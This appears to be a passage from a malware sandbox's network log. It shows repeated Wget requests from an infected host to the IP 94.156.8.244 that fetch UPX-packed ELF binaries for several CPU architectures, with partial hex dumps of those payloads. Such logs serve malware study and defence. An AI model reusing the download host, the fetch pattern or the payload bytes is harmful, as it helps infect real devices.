                                                                  Mar 29, 2024 10:40:18.130239010 CET1286INData Raw: 4e f5 16 10 ac fd b6 fb 84 0b 97 bf 32 9b 79 6c f4 0e 4c 33 5d 18 71 06 47 dc 95 f9 0b f4 03 cc f6 da 46 cc 35 09 5d 50 74 ac 5b 42 9a a8 53 24 7d 47 c5 e5 4f 11 eb 23 f1 7c 3b 81 7a dd 66 69 04 a5 2d b2 96 b1 08 e7 4a d1 79 e1 f6 9b 7a 9a 51 94
                                                                  Data Ascii: N2ylL3]qGF5]Pt[BS$}GO#|;zfi-JyzQLm930&JHTGY3I5UsR5':?[2}jl2R9'ZpUZudb&<QqJ@Vdw~"T~_May&%:*Q$}bo
                                                                  Mar 29, 2024 10:40:18.130361080 CET1286INData Raw: f8 d8 a0 03 f3 0a 14 82 2e 71 22 df b5 f6 33 1f df 9a 85 7c 8b 6c 01 99 c9 b0 f7 ec 13 0d 7f 2e c6 17 28 45 84 b8 e7 4f 45 25 7b dc 78 26 f7 22 a7 75 a1 30 87 ee b4 ec b5 69 f9 71 7d 45 47 e8 96 b2 b5 8f 85 b2 8e 63 e1 23 99 a6 d7 07 f8 c6 b9 24
                                                                  Data Ascii: .q"3|l.(EOE%{x&"u0iq}EGc#$itD)jBs~W.-{_7l[>EL3|5e4nlaoO"nW'r$F}ED)vCuT11C2\Agmo4Yo#P*]6.zX/c0P
                                                                  Mar 29, 2024 10:40:18.130526066 CET1286INData Raw: 69 01 4e 0c 5e 35 ef 31 5f f0 49 e0 ec b8 74 e4 37 e9 66 da 81 f7 63 cb 58 84 53 f1 18 e0 fb 49 06 b2 db 88 b3 31 fc d5 00 8a 4c 34 6f 3f 95 97 af bb 29 cc 77 54 7f 0c f8 f3 52 06 39 bd 11 09 08 26 3d 2b 98 68 4c 4e 89 93 fc 8d 25 b0 5a d5 f4 8e
                                                                  Data Ascii: iN^51_It7fcXSI1L4o?)wTR9&=+hLN%ZC"l9Xc|u~EK{Fsntu)WI7t$r#-)za~O5;F;y,B^rvzKZ>.A@47[v!p1IJWy40md@2y50FEab(k{
                                                                  Mar 29, 2024 10:40:18.130840063 CET1286INData Raw: 09 4a 65 db ea 28 e3 67 c8 78 2d a3 a2 2b 57 4b 6c f1 8d 41 6b 9a 81 8b 9e e8 88 d1 1a 06 b7 ac dd 94 bb 53 90 40 85 ab b2 11 b6 c8 42 4b 3a 08 8d 64 1c dc f5 19 fe 42 10 53 82 5c 92 0e 6e b1 ce 9a 0b fc c4 da bf b4 85 96 8c 9a 41 e6 e3 7d 84 93
                                                                  Data Ascii: Je(gx-+WKlAkS@BK:dBS\nA}GRpa<gm&xA:!TvecPo&7&`L.k:zM]Im(GZ67R44.(2axdbuXr)T(\&0H2<cN<lD?t^'!CliA`;J*T
                                                                  Mar 29, 2024 10:40:18.130907059 CET1286INData Raw: ec fa d6 fd 73 66 98 a2 21 9e 6f 52 5a a2 01 df b9 dc 95 cd f4 00 3a 78 fb 70 4c 73 2f eb e1 85 8e 30 4b 32 7d fe d1 36 ca 46 b5 38 b5 9c 51 ed 26 be 70 f5 ee ec 29 09 8b 91 8d be 63 f4 35 d2 44 c3 d1 5d 28 a6 10 32 9e 36 f3 82 da 9f 98 14 36 27
                                                                  Data Ascii: sf!oRZ:xpLs/0K2}6F8Q&p)c5D](266'%#kf{n%WRXs=''\?m@H`V-W3T|yRKzoU<\h>Ir=)4$|ax>~*?g@royJiRkN
                                                                  Mar 29, 2024 10:40:18.131088972 CET1286INData Raw: 6b a1 56 d4 d5 8b 14 ea 4b 08 a6 9b 3c 78 a9 29 66 c2 d3 09 04 11 2c f6 70 28 dd a6 4e 25 9c 0a 28 b4 ba 79 14 b1 b9 6a 83 83 16 1d b2 a8 23 ce ad 79 b7 15 d5 03 7b a8 4b 0e a1 a7 b3 2f fc a6 82 80 b9 49 80 48 65 a2 57 5b e4 19 42 64 64 0b c9 a9
                                                                  Data Ascii: kVK<x)f,p(N%(yj#y{K/IHeW[Bdd-m&;sVpC}d`pkb;jOT+<{}:d(VY_>|?Yc<|\KS1e#p]VVhfwyT,s
                                                                  Mar 29, 2024 10:40:18.131150007 CET1286INData Raw: e6 2d a2 f8 7c 0a 10 b7 a9 1b dd 5c 02 13 da 2f df 68 67 67 a7 89 f7 df b6 c2 cd ba 9d 4c 30 2f 0d 51 16 a7 f2 3a 26 37 93 e3 e5 f3 0f 8c 84 79 b5 8d d3 a9 75 79 42 44 1f 47 a1 df 9e db 1a cd 4e 5d 74 7e f9 df 29 fd 04 3c ac a4 99 3c 17 be bf 0b
                                                                  Data Ascii: -|\/hggL0/Q:&7yuyBDGN]t~)<<0,D&)%60=I}A6U^:Zb)=)kijKP>kN*(PvwZqGiJ?H*<c3<WO$Jv~oZf
                                                                  Mar 29, 2024 10:40:18.131206989 CET1286INData Raw: d6 2e 5a a6 f0 1e 3f ed 61 a2 df b9 01 1b 25 30 c3 d3 69 1b 44 18 88 eb bb bd 96 9b c5 2c 79 3e f4 df cd c4 91 52 70 d8 ce 13 39 e2 aa fc f7 c9 66 fd 19 4b 08 21 48 58 a3 f5 14 5b 96 93 97 29 fd cc 6b 33 c0 9c ca f6 66 74 cd 1b 20 e1 7a 69 c9 74
                                                                  Data Ascii: .Z?a%0iD,y>Rp9fK!HX[)k3ft zit&}0qC.%xoW}Ez:VMZnByQzYeAMxSCYF#~6U+r0.$4gjuefn_DH}FrsQ *!
                                                                  Mar 29, 2024 10:40:18.333620071 CET1286INData Raw: 43 02 d2 f8 98 1b bb d9 94 e2 6d 5a 5d 1d 6d 2c e3 72 cb ae 36 0d 9c 8d 2f ee ef cf 84 f3 b2 28 13 94 c3 db da e1 1d ba 6b a5 95 5c 4e 0d 41 3b b4 c1 89 85 d0 81 fa 4b c0 e0 b6 13 81 41 2b 46 c1 ac a0 b8 df 2e e5 e1 7a 90 f1 85 8e dd c3 3e 53 f0
                                                                  Data Ascii: CmZ]m,r6/(k\NA;KA+F.z>S5*8F<f93CLX}9<g:k!*12Cw.uEnHn.t4Pd66k7w3A}%sp^7IMspEXb(d50b;bN2


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  2192.168.2.234312694.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:19.010656118 CET155OUTGET /mpsl HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:19.218004942 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 36568
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:48 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:19 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 68 7a 10 00 34 00 00 00 00 00 00 00 07 10 00 00 34 00 20 00 02 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 10 00 00 00 10 00 a5 8d 00 00 a5 8d 00 00 05 00 00 00 00 00 01 00 01 00 00 00 80 69 00 00 80 69 46 00 80 69 46 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 01 00 1b d1 54 0e 55 50 58 21 64 13 0d 1e 00 00 00 00 74 84 01 00 74 84 01 00 94 00 00 00 54 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b de de a6 0f 23 da 99 a6 00 f8 fc 62 87 4c 23 33 c6 71 86 ce 3d a0 b1 68 c8 a5 a3 c4 ac 16 92 11 b5 5f 71 40 69 e9 da 92 91 8c e9 98 c5 91 79 29 77 5c 0c d2 b1 34 bf d7 3d 63 2d 6e ff d9 34 c3 7b 9a e9 3d 2d 79 c6 e1 04 a1 2c ac 77 01 00 18 75 00 00 0e 00 00 00 1a 03 00 03 00 00 cb 29 1a 3b ed e4 bb a2 eb 56 9c ea 2a 46 98 7f 36 92 72 7f bf e1 0b 1a 5c 5a c0 4f 31 60 7c cd 08 6c 7b da 41 18 2c 4c 08 7a 91 50 87 d9 9b b2 94 af 72 b7 37 be 8f 7d 5a 83 2a 2d 33 d2 39 7f bf a1 a4 d2 7f f7 c7 c3 8c 9e e0 ad 47 ed 36 c9 8a 6a 92 a2 02 8c ce a5 a2 5c d6 b4 e9 38 bb ef 76 80 44 28 35 b0 df 03 81 82 9a d8 98 d9 12 8d eb bd 99 c3 fb d0 de 96 96 ca e1 41 2a 17 78 0b 65 d9 0b 12 98 65 06 4f 18 7f f5 05 15 f4 76 d8 18 45 bf 4f 99 b3 a9 e9 6a cf 0f dc 92 2c b1 4e 54 4b 6e b7 0e 68 46 89 6c 31 1f 3d 15 18 88 f1 01 33 79 fd 68 fa 4c 2b e2 d3 6e de 3d b1 4c 19 81 52 29 de 2d 2f 49 76 0a 17 26 39 2f d3 d8 fe ab 7b e9 9e b7 b6 44 6c ae 95 ca 5a 0a 58 c1 74 74 ae 09 d3 f5 ae 7a c3 ae 84 de 5c f9 f1 db 07 18 7e ba bb 30 42 61 a9 36 43 65 79 fe 36 ba a3 0a e8
                                                                  Data Ascii: ELFhz44 (iiFiFTUPX!dttT?Eh;#bL#3q=h_q@iy)w\4=c-n4{=-y,wu);V*F6r\ZO1`|l{A,LzPr7}Z*-39G6j\8vD(5A*xeeOvEOj,NTKnhFl1=3yhL+n=LR)-/Iv&9/{DlZXttz\~0Ba6Cey6
                                                                  Mar 29, 2024 10:40:19.218019962 CET1286INData Raw: d9 59 31 84 e7 d1 3b 0e eb 39 6e 95 93 ff 9a 31 bf 0a 2e 2d bd eb a9 52 99 5d ad 3d fd 92 13 c9 4b 9d 4c ce 86 8a a5 fe aa 76 1c 42 4b 8b bd 56 76 2c e5 0a f4 fe 9e a2 da 60 d5 2b 01 6a f2 fd 43 d1 5d 80 49 84 f4 7f 8f 71 51 5e 73 03 a8 37 d0 ea
                                                                  Data Ascii: Y1;9n1.-R]=KLvBKVv,`+jC]IqQ^s7I)MA-36u8eL1h:K~J.\SL}UEnX"Cj$537Gk8E}!1e#W<!_u!>F+6LWO+k/.AP8&GR9eEWT|TdM
                                                                  Mar 29, 2024 10:40:19.218138933 CET1286INData Raw: 2e 1f eb fb e0 4c 87 18 d9 28 03 02 fa 56 4a ec ce e6 7c 7b 8a fe 13 d7 68 96 14 b1 93 52 83 a3 ae ea c0 b0 a9 9e f2 15 7e 27 2f bd 07 60 1e 77 91 a1 33 0f e3 76 a3 4f 84 e6 d9 ef 15 fe c5 29 cd 05 b2 43 eb be d1 45 97 d8 1c c4 e4 b0 be 2a 9a fe
                                                                  Data Ascii: .L(VJ|{hR~'/`w3vO)CE*iFi1z\+xMV,ej%"${x4$-~,&6suVE8kELKvE&*CW8vr?W>2XYTon}uPVjLz_6kT%uJkd!
                                                                  Mar 29, 2024 10:40:19.218151093 CET1286INData Raw: e8 71 f0 7c 08 63 9c 86 cf 4f e6 db 4f 2b b9 bb 40 a7 6c 11 29 32 df 23 04 76 33 40 f0 fb c8 68 cb 6a 62 f5 49 49 36 ce 07 d8 a8 30 fd 6c 1d a2 a8 02 df 14 4b ad 8c 61 1f 72 05 a4 41 35 88 ae 82 b8 62 53 5e cd c8 6c 60 9a e1 de 0b 25 a3 60 10 f7
                                                                  Data Ascii: q|cOO+@l)2#v3@hjbII60lKarA5bS^l`%`f%(+wRqVs&{8~g2L|5aXb1U/{R^'#v6\nna:}/|\!!oBvFv5d3_=faU
                                                                  Mar 29, 2024 10:40:19.218305111 CET1286INData Raw: 99 4d 1a 3c a2 ef 89 70 5e 70 81 b2 ce c4 87 13 b7 0d 41 51 14 46 cc 17 e3 df d4 2d 16 f5 f6 22 68 82 ab 00 b3 8c 94 ff b5 2d d0 4b 90 63 e8 b9 4c 58 4b 18 28 12 b3 4f 43 d9 6c cd 15 e8 35 db b1 a6 e1 1d c5 b4 4b b3 cd f8 66 2f 4b 13 7f 01 9a 06
                                                                  Data Ascii: M<p^pAQF-"h-KcLXK(OCl5Kf/K;u-k*IO(G~0~:"bU]fp[;hLpw4T NX/C6}Tl4y(\-> sq|,'S]
                                                                  Mar 29, 2024 10:40:19.218317032 CET1286INData Raw: b5 d7 c8 84 85 0a 8b 3a ad 8f 3b fd 7d 74 d7 1b 7d ae ca 66 a8 3f d7 bf 40 70 d4 ef 7a 62 23 9c 29 4c f1 c3 6d 3b 3f b1 7e f1 d1 40 6a a7 39 b2 9c 93 f8 9d c7 15 22 2f 60 8b ff 58 fc 01 3c 96 bb a7 57 32 07 3d b0 79 05 c2 0e 8c 06 c3 18 10 b6 d3
                                                                  Data Ascii: :;}t}f?@pzb#)Lm;?~@j9"/`X<W2=y4R]a`\!E3hUpfT2F&6MERS|FTP=`[JNSL<9>NrY_geSHd+Hpsu9|dN1U[-IIm
                                                                  Mar 29, 2024 10:40:19.218327999 CET1286INData Raw: d6 d5 1a e6 b2 3f 34 5b 9b eb 49 5a b7 4d c9 b3 1d 07 27 f7 c2 f4 2f e1 e1 93 c7 1b 1b 44 0b a8 ea df e0 9c 6d b7 ba f1 4e 61 05 0c 18 46 77 6e 10 f3 d2 d3 46 4d a6 7c d5 cc 41 3d bc de a5 d6 93 e5 d2 cf 35 3f 35 35 6d d3 1c 0f 3e a1 66 65 9e 64
                                                                  Data Ascii: ?4[IZM'/DmNaFwnFM|A=5?55m>fedf,HQY41k\o#T|A293]B'Ww%#R$SdUM-Ymq9@y~u=kHyPWR*[uNDCJ7BX)z5
                                                                  Mar 29, 2024 10:40:19.218341112 CET1286INData Raw: 5a 03 94 8d 4d c3 18 06 86 29 0d e6 e2 5b 87 69 e8 ad 88 0d 49 91 c8 b9 e2 fe ed f0 79 1d a6 d6 b3 24 50 dc ce a7 f7 35 53 8d f4 a3 04 ec 27 b4 91 96 fd 24 da 7d e5 21 4c d8 5e ee 89 6f 2c cb a9 8f c2 a1 02 8e 1b 3f 73 d2 02 7c 6e c6 4a f7 76 d0
                                                                  Data Ascii: ZM)[iIy$P5S'$}!L^o,?s|nJvwC?=;1|j7@v>Ia<+K@KA-&U5Pa2Q2uS/CTYtZ2|zyAF{rauqhd/~Q#1V'\/a
                                                                  Mar 29, 2024 10:40:19.218492031 CET1286INData Raw: 84 47 34 a3 e4 94 4f ab 54 0c 06 52 92 bb 13 b1 97 b0 70 8f 43 31 41 43 6f 54 13 2b ae f7 91 91 85 a5 c9 3a 1e 90 43 d0 3d 3e c7 7d 94 81 d2 39 67 a3 3a 8a f6 66 b5 0f 51 a1 48 71 9f 75 cc d4 e2 01 5a 19 c2 20 c6 9d f5 35 29 29 e9 f3 b8 0a 1c 08
                                                                  Data Ascii: G4OTRpC1ACoT+:C=>}9g:fQHquZ 5))qC`=/32.<x}tE+O.7B]#ur:6<b&(Mcyf^sb>`Xu&e`bv%wdAg[~q!WIC;/
                                                                  Mar 29, 2024 10:40:19.218503952 CET1286INData Raw: 20 f2 35 06 0a 14 ba b8 53 9c fa cb da 81 b6 92 29 a1 c5 83 77 c1 12 2a 5c d5 2a 1e b2 17 ad ea 3e bd 83 f9 0b ab f0 d1 1c 84 48 5c 04 1a 4e 13 f4 0d e4 79 52 41 9c af b0 b5 6c 72 31 2f d0 6f e1 a5 23 65 87 2e a9 24 3b 6b eb 74 81 a2 c6 15 fa bb
                                                                  Data Ascii: 5S)w*\*>H\NyRAlr1/o#e.$;kt&)$P87aW32)W;KZ~cgCq=T<Ws_sf;2ow-]#)`[XSf0-q{FSe/O1oF*<T>
                                                                  Mar 29, 2024 10:40:19.421968937 CET1286INData Raw: a2 f0 6a df a0 2f d3 17 da 04 c5 28 3e 12 c7 15 a8 89 34 8e 35 85 29 d1 8b b4 86 1a ce 7d e2 40 51 f2 06 ae 43 26 de b2 db 3b ab 39 84 89 a8 ae 1c 9f cb 52 63 bd 12 fb 5d 1e a9 6a 29 f3 41 48 4e cc 60 b1 a5 c3 8c b0 a5 39 9a d5 4b f1 33 4a 26 bd
                                                                  Data Ascii: j/(>45)}@QC&;9Rc]j)AHN`9K3J&10Q=P<:G.W9"59K3]e.-gP[3#<=]o5R> /}+ze-.6jKn?krEA>|qV,%O+g


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  3192.168.2.234313094.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:20.698044062 CET157OUTGET /x86_64 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:20.901073933 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 36188
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:55 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:20 GMT
                                                                  Data Raw: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 02 00 3e 00 01 00 00 00 60 84 10 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 38 00 03 00 40 00 00 00 00 00 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 00 00 4a 8c 00 00 00 00 00 00 4a 8c 00 00 00 00 00 00 00 00 10 00 00 00 00 00 01 00 00 00 06 00 00 00 a8 06 00 00 00 00 00 00 a8 56 52 00 00 00 00 00 a8 56 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 3e a4 e8 5d 55 50 58 21 f4 07 0d 16 00 00 00 00 70 29 01 00 70 29 01 00 e8 00 00 00 60 00 00 00 02 00 00 00 fb fb 21 ff 7f 45 4c 46 02 01 01 00 02 00 3e 00 0d 94 01 40 0f b7 65 bf 17 05 00 f0 26 23 13 38 00 2d 3b df bb 03 05 0a 00 09 00 15 05 1d 06 1b f2 84 07 f0 21 01 17 10 ba 49 f7 45 0d 06 17 f8 07 51 0b 7b 76 42 b8 04 2d b0 34 37 c9 23 b0 f3 51 e5 74 64 00 08 00 00 00 00 80 00 40 02 00 ff 08 21 01 00 91 81 00 00 02 49 07 00 bf 6f bb ff 48 83 ec 08 e8 07 00 00 64 04 f1 94 0d c4 08 c3 00 00 80 3d 6f b7 ff ed b9 25 11 06 55 48 89 e5 74 10 eb 38 90 19 c0 08 0b 05 0d 21 f7 6f ee 6f 14 ff d2 48 8b 05 04 08 06 10 48 85 d2 75 e4 b8 30 de fd ff b7 09 c0 74 0a bf f0 21 41 00 e8 c0 fe bf ff c6 05 79 3f 01 c9 c3 66 fe 37 ac db 00 90 02 55 24 50 0f be e0 26 51 00 6c f7 66 ce 2c 93 5c 3d a3 20 6d 74 19 25 73 ff f2 36 22 bf 18 22 49 89 c3
                                                                  Data Ascii: ELF>`@@8@JJVRVRQtd>]UPX!p)p)`!ELF>@e&#8-;!IEQ{vB-47#Qtd@!IoHd=o%UHt8!ooHHu0t!Ay?f7U$P&Qlf,\= mt%s6""I
                                                                  Mar 29, 2024 10:40:20.901154995 CET1286INData Raw: c9 41 ff e3 3f 48 ff 6d bb 7d 90 90 31 ed 0f d1 5e 40 e2 2f e4 f0 50 54 48 c7 c7 20 5d f9 e5 ed 67 40 00 06 c1 e8 00 49 c7 c0 b6 f2 c6 d3 fe df de da 3e f4 2b 25 5c 24 d0 04 6c 24 d8 89 fb 4c 89 64 24 e0 4c ef 5e 5e ee 0b e8 89 f5 74 24 f0 7c 24
                                                                  Data Ascii: A?Hm}1^@/PTH ]g@I>+%\$l$Ld$L^^t$|$8AoRME9{ykot*EHLCXJwL A(L0k-8=t <uH ,1$~mN1UA:ht9tn{p@wA8uA1P
                                                                  Mar 29, 2024 10:40:20.901168108 CET1286INData Raw: 5d d1 43 60 b3 4d 9a 5b c3 3f 41 57 6e f4 1f bc 98 f7 be 08 9c 56 41 55 41 54 a9 d4 45 06 bf 58 de 31 e4 55 53 cb 68 40 88 01 bb 40 ec c0 0f b4 80 ab ba 02 a2 bb 0f 36 18 de 9b e7 e0 10 16 06 04 c9 36 d9 ed b9 ff ff 14 ba 03 19 88 18 2b 93 65 92
                                                                  Data Ascii: ]C`M[?AWnVAUATEX1USh@@66+e@1.JI/6mQe^wu4[:7[e@/FEqu(d1A^d}-m(DT2fD[0fJ2_;U|.fU,&vz -4D-~
                                                                  Mar 29, 2024 10:40:20.901201963 CET1286INData Raw: 05 06 ba 87 c3 6e 69 84 12 18 40 96 70 49 96 30 7d 11 fc 20 25 15 90 43 58 1f c0 2f 30 a9 17 53 cc 55 89 d5 53 81 86 36 d0 39 df 46 48 48 c1 18 4b 67 c4 16 e9 25 62 0e df 97 df 11 a2 75 af be 36 26 dd 31 ec d8 9a 61 59 e8 81 1f 16 c6 e0 2b 16 12
                                                                  Data Ascii: ni@pI0} %CX/0SUS69FHHKg%bu6&1aY+!&@]"+*-iD0M80KT_\%|AEE1H&=Ex&_E3l734[*%ejm>~.0uf*;425T}/Dw]7M6F!<wAIh4
                                                                  Mar 29, 2024 10:40:20.901225090 CET1286INData Raw: 1e ec 13 1e 42 41 77 5d 1f 13 9b 4e e5 fa 1c 16 0d 08 ac 14 18 10 12 fa 2b b8 5f a7 a1 d7 c1 2d 20 cd 53 f0 88 8d 63 53 06 44 0e 27 b4 ee c9 94 0c 06 db 28 ee 17 56 4c c9 5d ee 0c 05 20 03 76 60 2e 60 47 06 1b 2c 65 70 61 f1 47 38 18 ec 41 92 01
                                                                  Data Ascii: BAw]N+_- ScSD'(VL] v`.`G,epaG8Al0<"`@!.9dDHagr*t LPl`hT!IpYSA+LgU|$h;X&9S&x0"d'L6sM8.bx+>M|Q^fPb#)HHAuu((D]>DYfr&
                                                                  Mar 29, 2024 10:40:20.901238918 CET1286INData Raw: 92 55 8e 30 74 ca 1c d8 2b 48 9d 00 e5 03 f2 e5 43 54 d2 94 f7 c2 44 65 9e bc 34 c0 c5 89 44 34 a6 72 92 17 24 f0 37 08 37 42 39 c9 4b 5e 37 58 37 6f 37 85 2f e4 48 0d ef 37 9c 37 b2 a7 00 e4 24 37 c5 35 f1 c8 23 92 27 35 e5 36 28 20 27 90 07 36
                                                                  Data Ascii: U0t+HCTDe4D4r$77B9K^7X7o7/H77$75#'56( '646@@6K6Z)y6j6u6u@TtTT/xq:6nbL,tM#S2bwGAM^.($Vm/\/f0o@9u&df>E/4?,
                                                                  Mar 29, 2024 10:40:20.901266098 CET1286INData Raw: 0c 3d a8 86 60 19 83 ee c7 da 2c cd 56 c4 34 de 34 45 d1 24 6a d8 0c bf fa c9 82 17 98 89 e8 d2 9a 4f 17 ec ce 47 a8 c3 22 47 e3 26 c2 a0 87 7c 47 fa 48 10 69 88 06 21 1a 30 f5 ee 82 3b 5e 70 e5 97 21 83 c1 0c 92 43 9a c1 9a 06 34 1c 68 17 34 0e
                                                                  Data Ascii: =`,V44E$jOG"G&|GHi!0;^p!C4h4Dv(lQ JC4F-0F4`r*"yF&GoYG&ZIx^JG2X: C/223+% HL dj9$@K(LLpMIvF+ Do6:07k$
                                                                  Mar 29, 2024 10:40:20.901278019 CET1286INData Raw: 35 38 cf 49 69 c0 a3 9b f0 06 22 25 df 5d 10 5b 6c 9a e7 79 15 10 cf ca 42 c1 fd ce cd da 16 a3 58 74 c8 0e 49 9b 6d 19 8c 73 bc 12 74 bd db ce 87 95 28 20 88 74 c3 1e c9 c1 7e 17 69 c7 74 ad ce 9b ce fb 9f 64 4a 88 ba 37 6b c0 2e 92 38 21 d3 7e
                                                                  Data Ascii: 58Ii"%][lyBXtImst( t~itdJ7k.8!~[w0AV<7&f6#\HA)L dfLl6BpQ,cC[D!6MoM( +GXvg3C948<9@DHL9CPTXID\AU
                                                                  Mar 29, 2024 10:40:20.901321888 CET1286INData Raw: 35 f8 09 26 29 3d 11 1b 3d 8b 9c 70 45 cc ef 9c 5b 84 bc ee c0 9e 98 90 54 b5 85 18 95 10 d8 97 ec 3a 47 9f 00 02 c3 be db 56 fd 90 35 5e 75 a9 fe 11 97 be ec 09 41 ff 16 f2 84 23 85 be e8 63 5c 1e be eb 32 81 4d 60 15 ee 2b f1 c8 00 f2 04 8b 08
                                                                  Data Ascii: 5&)==pE[T:GV5^uA#c\2M`+A@N`d9122't-~-^?;:N nyilu!8Couz~jL~tgo]m&nM7 54N\uzG~)1#
                                                                  Mar 29, 2024 10:40:20.901348114 CET1286INData Raw: 48 f3 23 fb 18 02 cc 50 bf 90 25 87 24 be a0 bd cd 56 00 96 26 d9 ba 9c 21 1c 30 62 84 2b 5f f4 55 05 64 22 58 b9 24 a3 cf b1 d0 14 8d 2c 10 0a a8 70 27 74 90 c0 3d b3 3c 07 6c b3 18 4e 3a 12 1d 6f de fa 8a a0 43 11 21 db a5 c1 1a 50 08 64 40 0e
                                                                  Data Ascii: H#P%$V&!0b+_Ud"X$,p't=<lN:oC!Pd@N5XV=ugA)8CW*TD<0K;'yg*$|>{4CGe?gURhjp4MU_@t7}D3V)+EB'
                                                                  Mar 29, 2024 10:40:21.104850054 CET1286INData Raw: 63 83 ee 04 12 06 36 fc 35 7c 3e 9f cf fe 35 f4 35 f6 35 ec 35 ea 35 42 3e 27 f9 e4 35 d9 35 d3 35 b6 ad 67 6c c4 14 be d0 22 03 88 c0 60 ae 7d a1 0b 04 c8 88 07 0e 23 11 4a 1b b0 7b 47 01 12 ea 18 35 c0 59 64 ba cb c6 18 d2 1b 02 07 14 80 9a b5
                                                                  Data Ascii: c65|>55555B>'555gl"`}#J{G5YdfQptQdd9F5<>4dddd6,*$_r4A)?EI.4)|>444444444.4s-m6OpDws-{Mj&$<ddF!0&dddd( >d


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  4192.168.2.234313494.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:22.688730001 CET154OUTGET /arm HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:22.892641068 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 34240
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:37 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:22 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 20 f3 00 00 34 00 00 00 00 00 00 00 02 02 00 00 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 cf 84 00 00 cf 84 00 00 05 00 00 00 00 80 00 00 01 00 00 00 a4 1a 00 00 a4 1a 03 00 a4 1a 03 00 00 00 00 00 00 00 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 74 da 36 ba 55 50 58 21 cc 11 0d 17 00 00 00 00 68 35 01 00 68 35 01 00 94 00 00 00 53 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b e0 7d a4 b8 05 5e ff bd e7 e6 0d 02 f9 91 c0 cb 66 45 c7 a2 b7 6a 9e 6c ab 8d 30 7a dd 24 a7 89 47 1f 73 42 83 1d eb 09 45 e9 d7 b3 11 fc 3f d1 dd ee 95 90 31 cc fb 99 ba 93 a9 f9 a0 bc ca f4 8a 46 8f 69 21 e4 a3 64 9e 74 88 2d 01 00 bb 70 00 00 0e 50 00 00 1a 03 00 06 b0 8f 6d a7 01 aa 74 15 4f e8 26 11 5d 9b a2 ff 24 53 f7 ab cd cd ff 78 56 f0 92 83 55 a8 74 a8 2e 12 55 1d 74 35 ab 07 04 33 74 6e c8 a2 37 ff 45 97 3b 56 37 2c bf b5 90 8e c0 f8 c5 bc 55 4b 3b 4f 7e c5 f1 5c 56 c0 b3 62 c0 3a e0 db 7d 30 56 a6 d6 1b 0a df 83 6f 44 c1 37 b7 74 df 54 d5 ad 6d 85 39 93 29 be f0 95 e8 30 ab 23 80 a2 a3 8f c0 44 cd b4 7f e9 3d bc b5 0d 79 d2 70 5a 31 08 de 08 9d 2b 2e 36 80 0d 7d 61 62 66 d9 b9 66 71 63 87 a9 51 28 ae d7 5a 8d 02 4f 6e ea 79 80 1b 55 ef d7 bd 58 d4 47 82 d7 e6 9e c6 24 03 bc 4e dd b9 4a c2 ea 8c 3f ba d4 11 a3 b3 3d 44 c3 41 ec c2 b4 ee f8 b7 dc fc fc 12 fb ba 1a 20 75 d0 5e 51 db fb a7 f9 b5 ce aa fb 9b 10 c9 9e 78 dc db df 70 a8
                                                                  Data Ascii: ELFa( 44 (Qtdt6UPX!h5h5S?Eh;}^fEjl0z$GsBE?1Fi!dt-pPmtO&]$SxVUt.Ut53tn7E;V7,UK;O~\Vb:}0VoD7tTm9)0#D=ypZ1+.6}abffqcQ(ZOnyUXG$NJ?=DA u^Qxp
